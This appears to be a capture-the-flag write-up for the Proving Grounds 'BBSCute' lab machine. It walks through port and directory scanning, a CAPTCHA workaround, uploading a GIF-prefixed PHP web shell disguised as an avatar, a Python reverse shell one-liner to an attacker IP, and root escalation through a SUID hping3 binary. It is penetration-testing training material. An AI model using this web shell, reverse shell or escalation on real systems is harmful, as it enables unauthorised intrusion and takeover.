Security Analyst | Security Researcher | CRTP

Proving grounds Play: BBSCute

Proving grounds Play - BBSCute CTF writeup.

Nmap

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04d06ec4ba4a315a6fb3eeb81bed5ab7 (RSA)
|   256 24b3df010bcac2ab2ee949b058086afa (ECDSA)
|_  256 6ac4356a7a1e7e51855b815c7c744984 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Debian Default Page: It works
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d

80/tcp - open http - Apache httpd 2.4.38 ((Debian))

naveenj@hackerspace:|00:36|~/pg-play/BBSCute$ dirsearch -u http://192.168.151.128/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url

Target: http://192.168.151.128/

[00:37:05] Starting: 
[00:37:21] 301 -  317B  - http://192.168.151.128/core  ->  http://192.168.151.128/core/     (Added to queue)
[00:37:23] 301 -  317B  - http://192.168.151.128/docs  ->  http://192.168.151.128/docs/     (Added to queue)
[00:37:24] 200 -    1KB - http://192.168.151.128/favicon.ico
[00:37:27] 200 -   10KB - http://192.168.151.128/index.html
[00:37:28] 200 -    6KB - http://192.168.151.128/index.php  #login page

http://192.168.151.128/index.php

img

Register ➡️ login ➡️ Upload Avatar ➡️ upload reverse shell/php code execution code as avatar.

Note: In order to do a successfull registration the CAPTCHA must be sumitted and which is not available on the registration page. So it can be obtained by viewing the CAPTCHA page source view-source:http://192.168.151.128/captcha.php

Upload.php

GIF98;
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
?>

Trigger Payload: http://192.168.151.128/uploads/avatar_naveenj_upload.php?cmd=id

Check the python version using which python command the create the reverse shell code.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.204",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

Initial Foothold

naveenj@hackerspace:|01:17|~/pg-play/BBSCute$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.151.128] 60944
www-data@cute:/var/www/html/uploads$ 

Privilege Escalation

Enumerate user executable permissions using sudo -l.

www-data@cute:/$ sudo -l    #check executable permissions
sudo -l
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp    
    www-data@cute:/$ ls -al /usr/sbin/hping3
ls -al /usr/sbin/hping3
-rwsr-sr-x 1 root root 156808 Sep  6  2014 /usr/sbin/hping3

The binary can be run as root without password.

www-data@cute:/$ hping3
hping3
hping3> whoami
whoami
root    #root obtained
hping3> id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
hping3>

Root Obtained

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.